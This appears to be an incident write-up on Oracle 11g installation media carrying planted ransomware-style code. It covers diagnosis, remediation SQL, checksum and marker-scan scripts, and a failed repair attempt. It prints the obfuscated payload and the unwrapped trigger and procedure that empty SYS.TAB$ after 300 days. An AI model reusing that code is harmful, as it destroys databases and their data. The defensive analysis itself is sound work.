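1. Symptoms
During a disaster recovery drill, the customer found that a database copied to the standby host from a storage snapshot failed to start, reporting ORA-00600 with argument [16703]: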
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [],
[], [], [], [], [], []
Process ID: 29255
Session ID: 191 Serial number: 3
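2. Analysis
Based on material found online, we concluded that the cause was malicious code (a ransomware variant) planted in the database installation media, which deleted the sys.tab$ table once the database was 300 days past its creation date. The malicious code has the following characteristics:
1) In the database software file prvtsupp.plb, the section for the dbms_support package body contains the following extra content: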
cat $ORACLE_HOME/rdbms/admin/prvtsupp.plb
...
create or replace procedure DBMS_SUPPORT_DBMONITORP wrapped
a000000
369
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
7
166 17d
L+Q5S7kOFTBh3pJuFhl03zpaj2EwgzKur9zWZ47SR+pHN0Y8ER0IGya9iryn8BXxVZV99MqT
jPeDOVN1pQjRL9BBh4vtWEKCY/FfMGPnetcyOwrCiZd3y4XmBCby580I22k2zARou4x8Mwl7
GOEcpi6u23Rf2JOnTfA/PYL+pz7A1gvabRQrczX6dnK8HaHsERgX7VdwA3EsM784UwL6ESro
H+CNqON6SdF2HTUFBcmgBBPE/+blRgHQryEpxT3JOnEs1a8gUbjaLq+Xq9Eu9n/kdIwA+9ep
r59hpFLw/vnP7Cjaxk7WbJ6/XGj9F6DH+3MBxpFBmba1tk0pYAW1McQsYXNFbiSdxj1KnrmD
lUETCD2WIxfg3w==
/
PROMPT Create DBMS_SUPPORT_DBMONITOR TRIGGER
create or replace trigger DBMS_SUPPORT_DBMONITOR
after startup on database
declare
begin
DBMS_SUPPORT_DBMONITORP;
end;
/
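Unwrapping the extra content shows that the malicious code creates a stored procedure, DBMS_SUPPORT_DBMONITORP, and an after-startup trigger, DBMS_SUPPORT_DBMONITOR. Once the database is 300 or more days past its creation date, the trigger fires at the next instance startup. The procedure then copies SYS.TAB$ into a table whose name begins with ORACHK, deletes every row from SYS.TAB$, commits, and forces a checkpoint, after which the database can no longer start.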
PROCEDURE DBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
END IF;
END;
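The date check in the procedure can be modeled outside the database to estimate when a given instance becomes exposed. The following is a minimal sketch, not the malware's exact arithmetic: it assumes the creation timestamp (V$DATABASE.CREATED) has already been read by other means, it ignores any rounding that happens when the PL/SQL assigns the day count to its INT variable, and the function names are hypothetical.

```python
from datetime import datetime, timedelta

# Threshold copied from the unwrapped procedure: IF (DATE1>=300)
ARM_AFTER_DAYS = 300


def days_since_creation(created: datetime, now: datetime) -> float:
    """Elapsed days, analogous to SYSDATE - CREATED in the procedure."""
    return (now - created) / timedelta(days=1)


def payload_armed(created: datetime, now: datetime) -> bool:
    """True if a startup at `now` would pass the 300-day check.

    Simplification: the PL/SQL stores the value in an INT variable, and
    any rounding that assignment performs is ignored here.
    """
    return days_since_creation(created, now) >= ARM_AFTER_DAYS


def first_armed_date(created: datetime) -> datetime:
    """Earliest moment at which the check passes under this model."""
    return created + timedelta(days=ARM_AFTER_DAYS)


if __name__ == "__main__":
    created = datetime(2021, 1, 1)  # hypothetical creation date
    print(first_armed_date(created))
    print(payload_armed(created, datetime(2022, 10, 10)))
```

Under this model, any startup on or after the date returned by first_armed_date runs the destructive branch, which is why a long-running instance that has never been restarted can appear healthy.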
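2) On the primary database, which had not yet been restarted, the stored procedure and trigger created by the malicious code are visible, and their content is identical to what the file above shows.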
SQL> select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
     where object_name like 'DBMS_STANDARD_FUN9%'
     union all
     select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
     where object_name like 'DBMS_CORE_INTERNAL%'
     union all
     select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
     where object_name like 'DBMS_SYSTEM_INTERNAL%'
     union all
     select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
     where object_name like 'DBMS_SUPPORT_INTERNAL%'
     union all
     select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
     where object_name like 'DBMS_SUPPORT%';
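3) The SHA1 value of the 11g installation package that carried the malicious code does not match the SHA1 value of the installation package downloaded from the official site.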
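A checksum comparison of this kind is easy to script before any installation media is used. The sketch below uses Python's standard hashlib module; the file path and the reference checksum are placeholders the reader must supply, and the reference value should come from the vendor's download page, since it is not reproduced in this text.

```python
import hashlib


def sha1_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the SHA-1 of a file as lowercase hex, reading in chunks
    so that multi-gigabyte installer archives do not fill memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published(path: str, published_sha1: str) -> bool:
    """Compare a file's SHA-1 with a published value, ignoring case
    and surrounding whitespace in the published string."""
    return sha1_of_file(path) == published_sha1.strip().lower()


if __name__ == "__main__":
    import sys

    # Usage (both arguments are supplied by the reader):
    #   python check_sha1.py <installer_path> <published_sha1>
    if len(sys.argv) == 3:
        ok = matches_published(sys.argv[1], sys.argv[2])
        print("match" if ok else "MISMATCH: do not install from this file")
```

A mismatch only shows that the file differs from the published one; it does not by itself identify what was changed.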
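3. Resolution
3.1. Restoring the standby
The primary database had passed the 300-day mark but had not been restarted since, so the malicious code had not yet been triggered to delete the sys.tab$ table. We therefore took a new snapshot of the primary and used it to copy the primary database to the standby host.
1) On the standby host, start the database in mount mode: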
SQL> startup mount;
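2) On the standby host, disable system triggers so that opening the database does not execute the malicious code:
SQL> alter system set "_system_trig_enabled"=false scope=both;
3) On the standby host, open the database:
SQL> alter database open;
4) On the standby host, drop the trigger and stored procedure created by the malicious code, and drop the DBMS_SUPPORT package: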
SQL> drop TRIGGER SYS.DBMS_SUPPORT_DBMONITOR;
SQL> drop PROCEDURE SYS.DBMS_SUPPORT_DBMONITORP;
SQL> drop PACKAGE DBMS_SUPPORT;
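5) On the standby host, edit $ORACLE_HOME/rdbms/admin/prvtsupp.plb and remove the malicious code listed above, that is, the content in the dbms_support package section that the normal file does not have; alternatively, simply empty the file.
6) On the standby host, re-enable system triggers:
SQL> alter system set "_system_trig_enabled"=true scope=both;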
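After step 5, one way to confirm that prvtsupp.plb is clean is to scan it for the two object names the malicious code uses. The sketch below is an illustration under assumptions: it only finds the plaintext names DBMS_SUPPORT_DBMONITORP and DBMS_SUPPORT_DBMONITOR (the wrapped body itself is not decoded), the helper names are hypothetical, and a variant that uses different names would not be detected.

```python
import re
from typing import List, Tuple

# Matches both names seen in the file: the procedure (trailing P)
# and the trigger (no trailing P).
MARKER_RE = re.compile(r"\bDBMS_SUPPORT_DBMONITORP?\b", re.IGNORECASE)


def find_markers(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, marker) pairs for every occurrence."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in MARKER_RE.finditer(line):
            hits.append((lineno, match.group(0).upper()))
    return hits


def scan_file(path: str) -> List[Tuple[int, str]]:
    """Scan a file on disk; undecodable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return find_markers(handle.read())


if __name__ == "__main__":
    import sys

    # Usage: python scan_plb.py <path to prvtsupp.plb>
    if len(sys.argv) == 2:
        found = scan_file(sys.argv[1])
        for lineno, marker in found:
            print(f"line {lineno}: {marker}")
        print("clean" if not found else f"{len(found)} marker(s) found")
```

The same scan can be run against the primary's copy of the file before and after the cleanup described in the next section.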
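3.2. Cleaning the primary
Perform steps 4 and 5 of section 3.1 on the primary to remove the malicious code from the primary database.
3.3. Attempted repair of the sys.tab$ table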
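As a test, we asked a database specialist to use a bbed script (see https://blog.csdn.net/linsenaa/article/details/121094839) to scan and repair the data files of a database whose sys.tab$ table had already been deleted. After the repair the database opened normally, but validating the data files reported a large number of logical corruption errors in file 1, as shown below: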
RMAN> BACKUP VALIDATE CHECK LOGICAL DATABASE;
Error backing up file 1, block 145: logical corruption
Error backing up file 1, block 146: logical corruption
Error backing up file 1, block 147: logical corruption
...
Error backing up file 1, block 94699: logical corruption
Error backing up file 1, block 99995: logical corruption
Error backing up file 1, block 99996: logical corruption
=================
File Status Marked Corrupt Empty Blocks Blocks Examined High SCN
---- ------ -------------- ------------ --------------- ----------
1    FAILED 0              13436        90883           1013574
  File Name: /u01/app/oracle/oradata/ORCL11G/datafile/o1_mf_system_kmfp8vnk_.dbf
  Block Type Blocks Failing Blocks Processed
  ---------- -------------- ----------------
  Data       564            56696
  Index      0              11682
  Other      0              9066
validate found one or more corrupt blocks
See trace file /u01/app/oracle/diag/rdbms/orcl11g/orcl11g/trace/orcl11g_ora_4766.trc for details
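With hundreds of corrupt blocks, it helps to collect the block numbers from the RMAN output rather than read them by eye. The sketch below assumes the output has been saved to a text file and that each error line has exactly the form shown above ("Error backing up file N, block M: logical corruption"); the function name is hypothetical.

```python
import re
from collections import defaultdict
from typing import Dict, List

ERROR_RE = re.compile(
    r"Error backing up file (\d+), block (\d+): logical corruption"
)


def corrupt_blocks(rman_output: str) -> Dict[int, List[int]]:
    """Map each data file number to the block numbers reported as
    logically corrupt, in the order they appear in the output."""
    blocks = defaultdict(list)
    for match in ERROR_RE.finditer(rman_output):
        blocks[int(match.group(1))].append(int(match.group(2)))
    return dict(blocks)


if __name__ == "__main__":
    import sys

    # Usage: python rman_blocks.py <saved RMAN output file>
    if len(sys.argv) == 2:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as handle:
            report = corrupt_blocks(handle.read())
        for file_no, block_list in sorted(report.items()):
            print(f"file {file_no}: {len(block_list)} corrupt block(s), "
                  f"first {block_list[0]}, last {block_list[-1]}")
```

The per-file count can then be compared with the "Blocks Failing" column in the summary to check that no error lines were missed.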
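An attempt to delete from sys.tab$ again on the repaired database failed with the following error. The recovered table structure may be abnormal, which would explain why the delete cannot proceed: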
SQL> delete sys.tab$;
delete sys.tab$
*
ERROR at line 1:
ORA-00600: internal error code, arguments: [kdBlkCheckError], [1], [145],
[6110], [], [], [], [], [], [], [], []
However, after the database was opened, user data still could not be exported; every attempt failed with the following errors:
Export: Release 11.2.0.4.0 - Production on Mon Oct 10 00:38:51 2022
Copyright (c) 1982, 2011, Oracle and/or its affiliates. All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
ORA-31626: job does not exist
ORA-31633: unable to create master table "SYSTEM.SYS_EXPORT_SCHEMA_05"
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 95
ORA-06512: at "SYS.KUPV$FT", line 1038
ORA-01578: ORACLE data block corrupted (file # 1, block # 82296)
ORA-01110: data file 1: '/u01/app/oracle/oradata/ORCL11G/datafile/o1_mf_system_kmfp8vnk_.dbf'
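Therefore, once the sys.tab$ table has been deleted, restoring from backup may be the only dependable option. Recovery with bbed may be feasible but is very complex, and if the recovery is incomplete, the data cannot be exported.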